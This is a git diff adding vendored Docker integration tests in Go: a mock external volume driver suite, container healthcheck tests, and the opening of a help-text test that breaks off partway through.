diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go
new file mode 100644
index 0000000000..806d87ec77
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go
@@ -0,0 +1,627 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/volume"
+	"github.com/go-check/check"
+)
+
+const volumePluginName = "test-external-volume-driver"
+
+func init() {
+	check.Suite(&DockerExternalVolumeSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type eventCounter struct {
+	activations int
+	creations   int
+	removals    int
+	mounts      int
+	unmounts    int
+	paths       int
+	lists       int
+	gets        int
+	caps        int
+}
+
+type DockerExternalVolumeSuite struct {
+	ds *DockerSuite
+	d  *Daemon
+	*volumePlugin
+}
+
+func (s *DockerExternalVolumeSuite) SetUpTest(c *check.C) {
+	s.d = NewDaemon(c)
+	s.ec = &eventCounter{}
+}
+
+func (s *DockerExternalVolumeSuite) TearDownTest(c *check.C) {
+	s.d.Stop()
+	s.ds.TearDownTest(c)
+}
+
+func (s *DockerExternalVolumeSuite) SetUpSuite(c *check.C) {
+	s.volumePlugin = newVolumePlugin(c, volumePluginName)
+}
+
+type volumePlugin struct {
+	ec *eventCounter
+	*httptest.Server
+	vols map[string]vol
+}
+
+type vol struct {
+	Name       string
+	Mountpoint string
+	Ninja      bool // hack used to trigger a null volume return on `Get`
+	Status     map[string]interface{}
+	Options    map[string]string
+}
+
+func (p *volumePlugin) Close() {
+	p.Server.Close()
+}
+
+func newVolumePlugin(c *check.C, name string) *volumePlugin {
+	mux := http.NewServeMux()
+	s := &volumePlugin{Server: httptest.NewServer(mux), ec: &eventCounter{}, vols: make(map[string]vol)}
+
+	type pluginRequest struct {
+		Name string
+		Opts map[string]string
+		ID   string
+	}
+
+	type pluginResp struct {
+		Mountpoint string `json:",omitempty"`
+		Err        string `json:",omitempty"`
+	}
+
+	read := func(b io.ReadCloser) (pluginRequest, error) {
+		defer b.Close()
+		var pr pluginRequest
+		if err := json.NewDecoder(b).Decode(&pr); err != nil {
+			return pr, err
+		}
+		return pr, nil
+	}
+
+	send := func(w http.ResponseWriter, data interface{}) {
+		switch t := data.(type) {
+		case error:
+			http.Error(w, t.Error(), 500)
+		case string:
+			w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+			fmt.Fprintln(w, t)
+		default:
+			w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+			json.NewEncoder(w).Encode(&data)
+		}
+	}
+
+	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.activations++
+		send(w, `{"Implements": ["VolumeDriver"]}`)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.creations++
+		pr, err := read(r.Body)
+		if err != nil {
+			send(w, err)
+			return
+		}
+		_, isNinja := pr.Opts["ninja"]
+		status := map[string]interface{}{"Hello": "world"}
+		s.vols[pr.Name] = vol{Name: pr.Name, Ninja: isNinja, Status: status, Options: pr.Opts}
+		send(w, nil)
+	})
+
+	mux.HandleFunc("/VolumeDriver.List", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.lists++
+		vols := make([]vol, 0, len(s.vols))
+		for _, v := range s.vols {
+			if v.Ninja {
+				continue
+			}
+			vols = append(vols, v)
+		}
+		send(w, map[string][]vol{"Volumes": vols})
+	})
+
+	mux.HandleFunc("/VolumeDriver.Get", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.gets++
+		pr, err := read(r.Body)
+		if err != nil {
+			send(w, err)
+			return
+		}
+
+		v, exists := s.vols[pr.Name]
+		if !exists {
+			send(w, `{"Err": "no such volume"}`)
+		}
+
+		if v.Ninja {
+			send(w, map[string]vol{})
+			return
+		}
+
+		v.Mountpoint = hostVolumePath(pr.Name)
+		send(w, map[string]vol{"Volume": v})
+		return
+	})
+
+	mux.HandleFunc("/VolumeDriver.Remove", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.removals++
+		pr, err := read(r.Body)
+		if err != nil {
+			send(w, err)
+			return
+		}
+
+		v, ok := s.vols[pr.Name]
+		if !ok {
+			send(w, nil)
+			return
+		}
+
+		if err := os.RemoveAll(hostVolumePath(v.Name)); err != nil {
+			send(w, &pluginResp{Err: err.Error()})
+			return
+		}
+		delete(s.vols, v.Name)
+		send(w, nil)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Path", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.paths++
+
+		pr, err := read(r.Body)
+		if err != nil {
+			send(w, err)
+			return
+		}
+		p := hostVolumePath(pr.Name)
+		send(w, &pluginResp{Mountpoint: p})
+	})
+
+	mux.HandleFunc("/VolumeDriver.Mount", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.mounts++
+
+		pr, err := read(r.Body)
+		if err != nil {
+			send(w, err)
+			return
+		}
+
+		if v, exists := s.vols[pr.Name]; exists {
+			// Use this to simulate a mount failure
+			if _, exists := v.Options["invalidOption"]; exists {
+				send(w, fmt.Errorf("invalid argument"))
+				return
+			}
+		}
+
+		p := hostVolumePath(pr.Name)
+		if err := os.MkdirAll(p, 0755); err != nil {
+			send(w, &pluginResp{Err: err.Error()})
+			return
+		}
+
+		if err := ioutil.WriteFile(filepath.Join(p, "test"), []byte(s.Server.URL), 0644); err != nil {
+			send(w, err)
+			return
+		}
+
+		if err := ioutil.WriteFile(filepath.Join(p, "mountID"), []byte(pr.ID), 0644); err != nil {
+			send(w, err)
+			return
+		}
+
+		send(w, &pluginResp{Mountpoint: p})
+	})
+
+	mux.HandleFunc("/VolumeDriver.Unmount", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.unmounts++
+
+		_, err := read(r.Body)
+		if err != nil {
+			send(w, err)
+			return
+		}
+
+		send(w, nil)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Capabilities", func(w http.ResponseWriter, r *http.Request) {
+		s.ec.caps++
+
+		_, err := read(r.Body)
+		if err != nil {
+			send(w, err)
+			return
+		}
+
+		send(w, `{"Capabilities": { "Scope": "global" }}`)
+	})
+
+	err := os.MkdirAll("/etc/docker/plugins", 0755)
+	c.Assert(err, checker.IsNil)
+
+	err = ioutil.WriteFile("/etc/docker/plugins/"+name+".spec", []byte(s.Server.URL), 0644)
+	c.Assert(err, checker.IsNil)
+	return s
+}
+
+func (s *DockerExternalVolumeSuite) TearDownSuite(c *check.C) {
+	s.volumePlugin.Close()
+
+	err := os.RemoveAll("/etc/docker/plugins")
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerExternalVolumeSuite) TestVolumeCLICreateOptionConflict(c *check.C) {
+	dockerCmd(c, "volume", "create", "test")
+
+	out, _, err := dockerCmdWithError("volume", "create", "test", "--driver", volumePluginName)
+	c.Assert(err, check.NotNil, check.Commentf("volume create exception name already in use with another driver"))
+	c.Assert(out, checker.Contains, "A volume named test already exists")
+
+	out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Driver }}", "test")
+	_, _, err = dockerCmdWithError("volume", "create", "test", "--driver", strings.TrimSpace(out))
+	c.Assert(err, check.IsNil)
+
+	// make sure hidden --name option conflicts with positional arg name
+	out, _, err = dockerCmdWithError("volume", "create", "--name", "test2", "test2")
+	c.Assert(err, check.NotNil, check.Commentf("Conflicting options: either specify --name or provide positional arg, not both"))
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, s.Server.URL)
+
+	_, err = s.d.Cmd("volume", "rm", "external-volume-test")
+	c.Assert(err, checker.IsNil)
+
+	p := hostVolumePath("external-volume-test")
+	_, err = os.Lstat(p)
+	c.Assert(err, checker.NotNil)
+	c.Assert(os.IsNotExist(err), checker.True, check.Commentf("Expected volume path in host to not exist: %s, %v\n", p, err))
+
+	c.Assert(s.ec.activations, checker.Equals, 1)
+	c.Assert(s.ec.creations, checker.Equals, 1)
+	c.Assert(s.ec.removals, checker.Equals, 1)
+	c.Assert(s.ec.mounts, checker.Equals, 1)
+	c.Assert(s.ec.unmounts, checker.Equals, 1)
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, s.Server.URL)
+
+	c.Assert(s.ec.activations, checker.Equals, 1)
+	c.Assert(s.ec.creations, checker.Equals, 1)
+	c.Assert(s.ec.removals, checker.Equals, 1)
+	c.Assert(s.ec.mounts, checker.Equals, 1)
+	c.Assert(s.ec.unmounts, checker.Equals, 1)
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("run", "--rm", "--volumes-from", "vol-test1", "--name", "vol-test2", "busybox", "ls", "/tmp")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("rm", "-fv", "vol-test1")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	c.Assert(s.ec.activations, checker.Equals, 1)
+	c.Assert(s.ec.creations, checker.Equals, 1)
+	c.Assert(s.ec.removals, checker.Equals, 1)
+	c.Assert(s.ec.mounts, checker.Equals, 2)
+	c.Assert(s.ec.unmounts, checker.Equals, 2)
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverDeleteContainer(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("rm", "-fv", "vol-test1")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	c.Assert(s.ec.activations, checker.Equals, 1)
+	c.Assert(s.ec.creations, checker.Equals, 1)
+	c.Assert(s.ec.removals, checker.Equals, 1)
+	c.Assert(s.ec.mounts, checker.Equals, 1)
+	c.Assert(s.ec.unmounts, checker.Equals, 1)
+}
+
+func hostVolumePath(name string) string {
+	return fmt.Sprintf("/var/lib/docker/volumes/%s", name)
+}
+
+// Make sure a request to use a down driver doesn't block other requests
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverLookupNotBlocked(c *check.C) {
+	specPath := "/etc/docker/plugins/down-driver.spec"
+	err := ioutil.WriteFile(specPath, []byte("tcp://127.0.0.7:9999"), 0644)
+	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(specPath)
+
+	chCmd1 := make(chan struct{})
+	chCmd2 := make(chan error)
+	cmd1 := exec.Command(dockerBinary, "volume", "create", "-d", "down-driver")
+	cmd2 := exec.Command(dockerBinary, "volume", "create")
+
+	c.Assert(cmd1.Start(), checker.IsNil)
+	defer cmd1.Process.Kill()
+	time.Sleep(100 * time.Millisecond) // ensure API has been called
+	c.Assert(cmd2.Start(), checker.IsNil)
+
+	go func() {
+		cmd1.Wait()
+		close(chCmd1)
+	}()
+	go func() {
+		chCmd2 <- cmd2.Wait()
+	}()
+
+	select {
+	case <-chCmd1:
+		cmd2.Process.Kill()
+		c.Fatalf("volume create with down driver finished unexpectedly")
+	case err := <-chCmd2:
+		c.Assert(err, checker.IsNil)
+	case <-time.After(5 * time.Second):
+		cmd2.Process.Kill()
+		c.Fatal("volume creates are blocked by previous create requests when previous driver is down")
+	}
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverRetryNotImmediatelyExists(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	specPath := "/etc/docker/plugins/test-external-volume-driver-retry.spec"
+	os.RemoveAll(specPath)
+	defer os.RemoveAll(specPath)
+
+	errchan := make(chan error)
+	go func() {
+		if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", "test-external-volume-driver-retry", "busybox:latest"); err != nil {
+			errchan <- fmt.Errorf("%v:\n%s", err, out)
+		}
+		close(errchan)
+	}()
+	go func() {
+		// wait for a retry to occur, then create spec to allow plugin to register
+		time.Sleep(2000 * time.Millisecond)
+		// no need to check for an error here since it will get picked up by the timeout later
+		ioutil.WriteFile(specPath, []byte(s.Server.URL), 0644)
+	}()
+
+	select {
+	case err := <-errchan:
+		c.Assert(err, checker.IsNil)
+	case <-time.After(8 * time.Second):
+		c.Fatal("volume creates fail when plugin not immediately available")
+	}
+
+	_, err = s.d.Cmd("volume", "rm", "external-volume-test")
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(s.ec.activations, checker.Equals, 1)
+	c.Assert(s.ec.creations, checker.Equals, 1)
+	c.Assert(s.ec.removals, checker.Equals, 1)
+	c.Assert(s.ec.mounts, checker.Equals, 1)
+	c.Assert(s.ec.unmounts, checker.Equals, 1)
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverBindExternalVolume(c *check.C) {
+	dockerCmd(c, "volume", "create", "-d", volumePluginName, "foo")
+	dockerCmd(c, "run", "-d", "--name", "testing", "-v", "foo:/bar", "busybox", "top")
+
+	var mounts []struct {
+		Name   string
+		Driver string
+	}
+	out := inspectFieldJSON(c, "testing", "Mounts")
+	c.Assert(json.NewDecoder(strings.NewReader(out)).Decode(&mounts), checker.IsNil)
+	c.Assert(len(mounts), checker.Equals, 1, check.Commentf(out))
+	c.Assert(mounts[0].Name, checker.Equals, "foo")
+	c.Assert(mounts[0].Driver, checker.Equals, volumePluginName)
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverList(c *check.C) {
+	dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc3")
+	out, _ := dockerCmd(c, "volume", "ls")
+	ls := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(ls), check.Equals, 2, check.Commentf("\n%s", out))
+
+	vol := strings.Fields(ls[len(ls)-1])
+	c.Assert(len(vol), check.Equals, 2, check.Commentf("%v", vol))
+	c.Assert(vol[0], check.Equals, volumePluginName)
+	c.Assert(vol[1], check.Equals, "abc3")
+
+	c.Assert(s.ec.lists, check.Equals, 1)
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGet(c *check.C) {
+	out, _, err := dockerCmdWithError("volume", "inspect", "dummy")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "No such volume")
+	c.Assert(s.ec.gets, check.Equals, 1)
+
+	dockerCmd(c, "volume", "create", "test", "-d", volumePluginName)
+	out, _ = dockerCmd(c, "volume", "inspect", "test")
+
+	type vol struct {
+		Status map[string]string
+	}
+	var st []vol
+
+	c.Assert(json.Unmarshal([]byte(out), &st), checker.IsNil)
+	c.Assert(st, checker.HasLen, 1)
+	c.Assert(st[0].Status, checker.HasLen, 1, check.Commentf("%v", st[0]))
+	c.Assert(st[0].Status["Hello"], checker.Equals, "world", check.Commentf("%v", st[0].Status))
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c *check.C) {
+	dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc1")
+	err := s.d.Restart()
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "run", "--name=test", "-v", "abc1:/foo", "busybox", "true")
+	var mounts []types.MountPoint
+	inspectFieldAndMarshall(c, "test", "Mounts", &mounts)
+	c.Assert(mounts, checker.HasLen, 1)
+	c.Assert(mounts[0].Driver, checker.Equals, volumePluginName)
+}
+
+// Ensures that the daemon handles when the plugin responds to a `Get` request with a null volume and a null error.
+// Prior the daemon would panic in this scenario.
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c *check.C) {
+	c.Assert(s.d.Start(), checker.IsNil)
+
+	out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, "abc2", "--opt", "ninja=1")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("volume", "inspect", "abc2")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "No such volume")
+}
+
+// Ensure only cached paths are used in volume list to prevent N+1 calls to `VolumeDriver.Path`
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverPathCalls(c *check.C) {
+	c.Assert(s.d.Start(), checker.IsNil)
+	c.Assert(s.ec.paths, checker.Equals, 0)
+
+	out, err := s.d.Cmd("volume", "create", "test", "--driver=test-external-volume-driver")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(s.ec.paths, checker.Equals, 1)
+
+	out, err = s.d.Cmd("volume", "ls")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(s.ec.paths, checker.Equals, 1)
+
+	out, err = s.d.Cmd("volume", "inspect", "--format='{{.Mountpoint}}'", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	c.Assert(s.ec.paths, checker.Equals, 1)
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverMountID(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("run", "--rm", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+}
+
+// Check that VolumeDriver.Capabilities gets called, and only called once
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverCapabilities(c *check.C) {
+	c.Assert(s.d.Start(), checker.IsNil)
+	c.Assert(s.ec.caps, checker.Equals, 0)
+
+	for i := 0; i < 3; i++ {
+		out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, fmt.Sprintf("test%d", i))
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		c.Assert(s.ec.caps, checker.Equals, 1)
+		out, err = s.d.Cmd("volume", "inspect", "--format={{.Scope}}", fmt.Sprintf("test%d", i))
+		c.Assert(err, checker.IsNil)
+		c.Assert(strings.TrimSpace(out), checker.Equals, volume.GlobalScope)
+	}
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *check.C) {
+	driverName := stringid.GenerateNonCryptoID()
+	p := newVolumePlugin(c, driverName)
+	defer p.Close()
+
+	c.Assert(s.d.StartWithBusybox(), checker.IsNil)
+
+	out, err := s.d.Cmd("volume", "create", "-d", driverName, "--name", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "volume named test already exists")
+
+	// simulate out of band volume deletion on plugin level
+	delete(p.vols, "test")
+
+	// test re-create with same driver
+	out, err = s.d.Cmd("volume", "create", "-d", driverName, "--opt", "foo=bar", "--name", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	out, err = s.d.Cmd("volume", "inspect", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	var vs []types.Volume
+	err = json.Unmarshal([]byte(out), &vs)
+	c.Assert(err, checker.IsNil)
+	c.Assert(vs, checker.HasLen, 1)
+	c.Assert(vs[0].Driver, checker.Equals, driverName)
+	c.Assert(vs[0].Options, checker.NotNil)
+	c.Assert(vs[0].Options["foo"], checker.Equals, "bar")
+	c.Assert(vs[0].Driver, checker.Equals, driverName)
+
+	// simulate out of band volume deletion on plugin level
+	delete(p.vols, "test")
+
+	// test create with different driver
+	out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("volume", "inspect", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	vs = nil
+	err = json.Unmarshal([]byte(out), &vs)
+	c.Assert(err, checker.IsNil)
+	c.Assert(vs, checker.HasLen, 1)
+	c.Assert(vs[0].Options, checker.HasLen, 0)
+	c.Assert(vs[0].Driver, checker.Equals, "local")
+}
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c *check.C) {
+	c.Assert(s.d.StartWithBusybox(), checker.IsNil)
+	s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--opt=invalidOption=1", "--name=testumount")
+
+	out, _ := s.d.Cmd("run", "-v", "testumount:/foo", "busybox", "true")
+	c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out))
+	out, _ = s.d.Cmd("run", "-w", "/foo", "-v", "testumount:/foo", "busybox", "true")
+	c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go
new file mode 100644
index 0000000000..6b7baebd00
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go
@@ -0,0 +1,169 @@
+package main
+
+import (
+	"encoding/json"
+
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func waitForStatus(c *check.C, name string, prev string, expected string) {
+	prev = prev + "\n"
+	expected = expected + "\n"
+	for {
+		out, _ := dockerCmd(c, "inspect", "--format={{.State.Status}}", name)
+		if out == expected {
+			return
+		}
+		c.Check(out, checker.Equals, prev)
+		if out != prev {
+			return
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+}
+
+func waitForHealthStatus(c *check.C, name string, prev string, expected string) {
+	prev = prev + "\n"
+	expected = expected + "\n"
+	for {
+		out, _ := dockerCmd(c, "inspect", "--format={{.State.Health.Status}}", name)
+		if out == expected {
+			return
+		}
+		c.Check(out, checker.Equals, prev)
+		if out != prev {
+			return
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+}
+
+func getHealth(c *check.C, name string) *types.Health {
+	out, _ := dockerCmd(c, "inspect", "--format={{json .State.Health}}", name)
+	var health types.Health
+	err := json.Unmarshal([]byte(out), &health)
+	c.Check(err, checker.Equals, nil)
+	return &health
+}
+
+func (s *DockerSuite) TestHealth(c *check.C) {
+	testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows
+
+	imageName := "testhealth"
+	_, err := buildImage(imageName,
+		`FROM busybox
+		RUN echo OK > /status
+		CMD ["/bin/sleep", "120"]
+		STOPSIGNAL SIGKILL
+		HEALTHCHECK --interval=1s --timeout=30s \
+		  CMD cat /status`,
+		true)
+
+	c.Check(err, check.IsNil)
+
+	// No health status before starting
+	name := "test_health"
+	dockerCmd(c, "create", "--name", name, imageName)
+	out, _ := dockerCmd(c, "ps", "-a", "--format={{.Status}}")
+	c.Check(out, checker.Equals, "Created\n")
+
+	// Inspect the options
+	out, _ = dockerCmd(c, "inspect",
+		"--format=timeout={{.Config.Healthcheck.Timeout}} "+
+			"interval={{.Config.Healthcheck.Interval}} "+
+			"retries={{.Config.Healthcheck.Retries}} "+
+			"test={{.Config.Healthcheck.Test}}", name)
+	c.Check(out, checker.Equals, "timeout=30s interval=1s retries=0 test=[CMD-SHELL cat /status]\n")
+
+	// Start
+	dockerCmd(c, "start", name)
+	waitForHealthStatus(c, name, "starting", "healthy")
+
+	// Make it fail
+	dockerCmd(c, "exec", name, "rm", "/status")
+	waitForHealthStatus(c, name, "healthy", "unhealthy")
+
+	// Inspect the status
+	out, _ = dockerCmd(c, "inspect", "--format={{.State.Health.Status}}", name)
+	c.Check(out, checker.Equals, "unhealthy\n")
+
+	// Make it healthy again
+	dockerCmd(c, "exec", name, "touch", "/status")
+	waitForHealthStatus(c, name, "unhealthy", "healthy")
+
+	// Remove container
+	dockerCmd(c, "rm", "-f", name)
+
+	// Disable the check from the CLI
+	out, _ = dockerCmd(c, "create", "--name=noh", "--no-healthcheck", imageName)
+	out, _ = dockerCmd(c, "inspect", "--format={{.Config.Healthcheck.Test}}", "noh")
+	c.Check(out, checker.Equals, "[NONE]\n")
+	dockerCmd(c, "rm", "noh")
+
+	// Disable the check with a new build
+	_, err = buildImage("no_healthcheck",
+		`FROM testhealth
+		HEALTHCHECK NONE`, true)
+	c.Check(err, check.IsNil)
+
+	out, _ = dockerCmd(c, "inspect", "--format={{.ContainerConfig.Healthcheck.Test}}", "no_healthcheck")
+	c.Check(out, checker.Equals, "[NONE]\n")
+
+	// Enable the checks from the CLI
+	_, _ = dockerCmd(c, "run", "-d", "--name=fatal_healthcheck",
+		"--health-interval=0.5s",
+		"--health-retries=3",
+		"--health-cmd=cat /status",
+		"no_healthcheck")
+	waitForHealthStatus(c, "fatal_healthcheck", "starting", "healthy")
+	health := getHealth(c, "fatal_healthcheck")
+	c.Check(health.Status, checker.Equals, "healthy")
+	c.Check(health.FailingStreak, checker.Equals, 0)
+	last := health.Log[len(health.Log)-1]
+	c.Check(last.ExitCode, checker.Equals, 0)
+	c.Check(last.Output, checker.Equals, "OK\n")
+
+	// Fail the check
+	dockerCmd(c, "exec", "fatal_healthcheck", "rm", "/status")
+	waitForHealthStatus(c, "fatal_healthcheck", "healthy", "unhealthy")
+
+	failsStr, _ := dockerCmd(c, "inspect", "--format={{.State.Health.FailingStreak}}", "fatal_healthcheck")
+	fails, err := strconv.Atoi(strings.TrimSpace(failsStr))
+	c.Check(err, check.IsNil)
+	c.Check(fails >= 3, checker.Equals, true)
+	dockerCmd(c, "rm", "-f", "fatal_healthcheck")
+
+	// Check timeout
+	// Note: if the interval is too small, it seems that Docker spends all its time running health
+	// checks and never gets around to killing it.
+	_, _ = dockerCmd(c, "run", "-d", "--name=test",
+		"--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1ms", imageName)
+	waitForHealthStatus(c, "test", "starting", "unhealthy")
+	health = getHealth(c, "test")
+	last = health.Log[len(health.Log)-1]
+	c.Check(health.Status, checker.Equals, "unhealthy")
+	c.Check(last.ExitCode, checker.Equals, -1)
+	c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1ms)")
+	dockerCmd(c, "rm", "-f", "test")
+
+	// Check JSON-format
+	_, err = buildImage(imageName,
+		`FROM busybox
+		RUN echo OK > /status
+		CMD ["/bin/sleep", "120"]
+		STOPSIGNAL SIGKILL
+		HEALTHCHECK --interval=1s --timeout=30s \
+		  CMD ["cat", "/my status"]`,
+		true)
+	c.Check(err, check.IsNil)
+	out, _ = dockerCmd(c, "inspect",
+		"--format={{.Config.Healthcheck.Test}}", imageName)
+	c.Check(out, checker.Equals, "[CMD cat /my status]\n")
+
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go
new file mode 100644
index 0000000000..29b6553fc5
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go
@@ -0,0 +1,321 @@
+package main
+
+import (
+	"fmt"
+	"os/exec"
+	"runtime"
+	"strings"
+	"unicode"
+
+	"github.com/docker/docker/pkg/homedir"
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestHelpTextVerify(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	// Make sure main help text fits within 80 chars and that
+	// on non-windows system we use ~ when possible (to shorten things).
+	// Test for HOME set to its default value and set to "/" on linux
+	// Yes on windows setting up an array and looping (right now) isn't
+	// necessary because we just have one value, but we'll need the
+	// array/loop on linux so we might as well set it up so that we can
+	// test any number of home dirs later on and all we need to do is
+	// modify the array - the rest of the testing infrastructure should work
+	homes := []string{homedir.Get()}
+
+	// Non-Windows machines need to test for this special case of $HOME
+	if runtime.GOOS != "windows" {
+		homes = append(homes, "/")
+	}
+
+	homeKey := homedir.Key()
+	baseEnvs := appendBaseEnv(true)
+
+	// Remove HOME env var from list so we can add a new value later.
+	for i, env := range baseEnvs {
+		if strings.HasPrefix(env, homeKey+"=") {
+			baseEnvs = append(baseEnvs[:i], baseEnvs[i+1:]...)
+			break
+		}
+	}
+
+	for _, home := range homes {
+
+		// Dup baseEnvs and add our new HOME value
+		newEnvs := make([]string, len(baseEnvs)+1)
+		copy(newEnvs, baseEnvs)
+		newEnvs[len(newEnvs)-1] = homeKey + "=" + home
+
+		scanForHome := runtime.GOOS != "windows" && home != "/"
+
+		// Check main help text to make sure its not over 80 chars
+		helpCmd := exec.Command(dockerBinary, "help")
